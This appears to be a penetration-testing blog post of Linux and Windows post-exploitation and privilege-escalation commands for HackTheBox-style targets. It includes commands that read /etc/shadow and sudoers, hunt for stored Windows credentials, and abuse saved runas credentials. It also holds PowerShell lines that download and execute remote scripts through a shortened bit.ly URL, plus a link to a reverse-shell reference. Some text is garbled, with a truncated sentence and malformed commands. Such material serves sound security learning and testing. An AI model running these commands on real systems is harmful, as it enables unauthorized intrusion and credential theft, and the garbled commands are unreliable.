A Pentesters Guide - Part 4 (Grabbing Hashes and Forging External Footholds)
If you're a penetration tester, you'll know the beauty of grabbing hashes and how easy
In this reference, valuable information has been adapted and shared from 0x00sec's privilege escalation wiki and g0tmi1k's escalation guide.
When pop a shell in either a Linux box, a Windows box, or some other obscure OS, you need to get your bearings very quickly and figure out what sort of access you have, what sort of system it is, and how you can move around.
Hopefully from your recon, you should already know what operating system you're working on, but occasionally you might just know "it's unix-like of some sort".
If you're doing HackTheBox, be sure to evaluate all of these things ;)
😄, from @hackthebox_eu I have found that priv esc methods on linux usually resort to:
— chivato (@SecGus) July 25, 2019
pspy
SUID/GUID
Creds in web files or DB
Kexploit or other CVE
Sudo perms
Strange read/write access on a file
I don’t THINK I missed any, then again I am mid-festival, good job though!
This will tell you two things instantly, whether your shell is indeed running some sort of bash.
whoami && id
This might reveal if you're inside a container or not.
env
You might get lucky and get a vulnerable linux privsec. This will also give you some insight as to your OS.
uname -a
If it looks something like: "de0921daed50" you might be inside a docker container.
hostname
This is important information. This will change your attack tactics. Source
cat /proc/1/cgroup
If you're inside a normal VM, it'll look like this:
vagrant@ubuntu-13:~$ cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/
5:memory:/
4:cpuacct:/
3:cpu:/
2:cpuset:/
If you're in a container, it might look like this:
vagrant@ubuntu-13:~$ docker run busybox cat /proc/1/cgroup
11:name=systemd:/
10:hugetlb:/
9:perf_event:/
8:blkio:/
7:freezer:/
6:devices:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
5:memory:/
4:cpuacct:/
3:cpu:/docker/3601745b3bd54d9780436faa5f0e4f72bb46231663bb99a6bb892764917832c2
2:cpuset:/
Feel free to extend this list however you like, the accessible executables will be returned along with their path.
for item in $(echo "iptabes id ifconfig ip netstat arp tmux perl python ruby ls gcc wget"); do which $item; done
You might find that you shell hasn't got a properly set PATH, this will massively impact what applications you have access to
echo $PATH
If your path is inaccurate, or you're having trouble executing commands, this will safe your day
find . -executable | rev | cut -d "/" -f 2-200 | rev | sort | uniq
Or if you want to grep for bin folders.
find . -executable | rev | cut -d "/" -f 2-200 | rev | sort | uniq | grep bin
find / -writable -type f -o -writable -type d 2>/dev/null | grep -Ev "^(/proc|/home/user|/tmp)"
Is somebody actively working on the machine?
find / -mmin -10 2>/dev/null | grep -Ev "^/proc"
Does anything pop out here?
ps -ef
ps -ef | grep root
ps aux
find / -perm -g=s -o -perm -u=s -type f 2>/dev/null
Unix has the ability to supply certain capabilities on different binaries, this has been a rooting method for reading files in many different ctfs and challenges.
From the / directory, run this.
getcap -r / 2>/dev/null
https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux
This will find world writable directories.
find /\(-perm -o w -perm -o x\) -type d 2>/dev/null
cat /etc/shadow
cat /etc/password
It might be simpler than you think!
sudo -l
sudo -s
cat /etc/sudoers
cat .bash_history | grep sudo
cat .bash_history | less
Download pspy:
wget https://github.com/DominicBreuker/pspy/releases/download/v1.0.0/pspy32s
Once downloaded, chmod +x pspy32s
and run it with ./pspy32s
. This will take over the entire terminal or shell, so be sure to start another shell if you're intending on doing some more poking around! Too many times have I started pspy just to ctrl+c when I had what I was looking for and to lose my shell. Infuriating, for reference you can launch a Perl reverse shell [like so](https://delta.navisec.io/reverse-shell-reference/#perl).
pspy will monitor running processes, typically this will pick up things like cronjob scripts, and the like. I reccomend preforming actions such as clicking around webapps on the box or ssh'ing in
This occurs when a script doesn't specifically specify the service path.
C:\> wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
C:\> icacls "C:\Program Files\Some Folder\"
C:\> sc stop [service name]
C:\> sc start [service name]
There is a process called 'Unattended installs' where system administrators can automate the installation of Windows. They usually leave a `unattended.xml` file behind. It will often contain configuration settings as well as the Administrator credientials! Other files might include sysprep.xml
So something that is used occasionally in CTF's is stored credentials using runas. For example.
Not so much a privesc tip, but certainly useful.
powershell.exe -command "(New-Object System.Net.WebClient).DownloadFile(\"http://127.0.0.1:8080/file.exe\", \"C:\Users/user\file.exe\")"
The following will show stored credientials:
cmdkey /list
And this will execute your executable:
runas /profile /savecred /user:ACCESS\Administrator "C:\Users\security\archive.exe"
A great tool for Windows Privilege escalation is PowerUp.
From Powershell:
IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")
After a download:
Import-Module "$(Get-Location)\PowerUp.ps1"
Running:
Invoke-AllChecks
You can find a good cheat sheet for PowerUp [here](https://h4ck.co/wp-content/uploads/2017/11/PowerUp.pdf)